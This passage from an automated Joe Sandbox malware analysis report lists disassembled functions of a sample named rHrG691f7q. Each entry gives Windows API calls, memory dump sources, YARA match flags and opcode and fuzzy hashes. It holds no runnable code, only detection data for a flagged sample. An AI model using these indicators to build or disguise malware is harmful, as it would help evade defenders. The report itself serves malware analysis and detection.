                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00E7
                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00EE
                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 024F0100
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                    • Instruction ID: 3d41be2cb853779122c00ac3dc7a88bb26d3543edbedc78cf1a7c96cbfde6a7c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E0B635000548EFCF626F55DD08A5A7B6AEB86B46F104029FA058B636CB36DA42DE44
                                                                                                                                                                                                                                                                    Function 024C092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                    • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                    • Instruction ID: 3cf85c9df842f6fd3bc5ce3c7d3ca3eea59eed0ec6bfa2d80cc57b71e0b954be
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A63137B6900609DFDB50CF99C880BAEBBF9FF48324F24504AD441A7310D771EA45CBA4
                                                                                                                                                                                                                                                                    Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                    • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                                                    Function 024F8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                    • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                    • Instruction ID: ad229483c852d6ee53efb4250a4e7a18463872af32814c639ad588bae306cc34
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A410876900219AEDB209FB9DC48EBB7779EFC4714F50466AFA05DB280E7319D41CB50
                                                                                                                                                                                                                                                                    Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                    Function 024EED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                    • Instruction ID: 4ae49a95b7c64ba767fb8a5f99d323f3de115220bcbad79950cb378f6a254cf8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28022D71E002199BEF14CFA9C9906AEF7F1EF88325F15826AD91AE7340D731A945CB80
                                                                                                                                                                                                                                                                    Function 024C2605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024C262C
                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 024C27CA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction ID: 6ad3a08127dbb01a78909def9183aaaebec7daf78f3187a793ccfc0e069aa659
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C412D25A6434095E730EFA5BC45B2633B0FF64B26F10252FD528CB2B2E3A28540C75E
                                                                                                                                                                                                                                                                    Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                    • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                                                    Function 024F6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024F6F21,?,?,00000008,?,?,024FF3E2,00000000), ref: 024F7153
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                    • Instruction ID: 6366081ffb8182c296b9658f943e77cf32c1c022f0677522e99c37241884c123
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0B16D312106089FD755CF28C486B66BBE1FF85368F258659E99ACF3A1C339D992CF40
                                                                                                                                                                                                                                                                    Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                    • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                                                    Function 024FB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                    • Instruction ID: 2c75188b5ff96f9cc0cf981139fa8a88b1d74d476f1b10bfc2653860193751ab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27218032A5020AABDF649E25DC41FBB77ADEB8A318F10017FEE01D6250EB79D945CB50
                                                                                                                                                                                                                                                                    Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                    • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                                                    Function 024FB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024F0A1C,?,024FBC89,00000000,?,?,?), ref: 024FB5A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                    • Instruction ID: d707b3e806164541dfa077f739ff801c7fc3bc8b35c1c4102fec721b69519838
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9311E93A2007059FDB189F39C8A167BBB92FFC575CB15442DDA4687B40D775B542CB40
                                                                                                                                                                                                                                                                    Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 787680540-0
                                                                                                                                                                                                                                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                    • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                                                    Function 024FBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024FB87A,00000000,00000000,?), ref: 024FBB08
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 787680540-0
                                                                                                                                                                                                                                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                    • Instruction ID: 126c4d58b6a73fb949c0d3614656510d35582df9a768315e6c31bf6f3c62d30d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F0F932A00115ABDB689E25CC45BBB7758EB8671CF04046ADF05A3644EB70BE42C6D0
                                                                                                                                                                                                                                                                    Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                    • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                    Function 024FB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024F0A1C,?,024FBC4D,024F0A1C,?,?,?,?,?,024F0A1C,?,?), ref: 024FB61B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                    • Instruction ID: c65b97290dd3b3519fff1fc5984bec49759590e777e402ff64cfcab3d53944b3
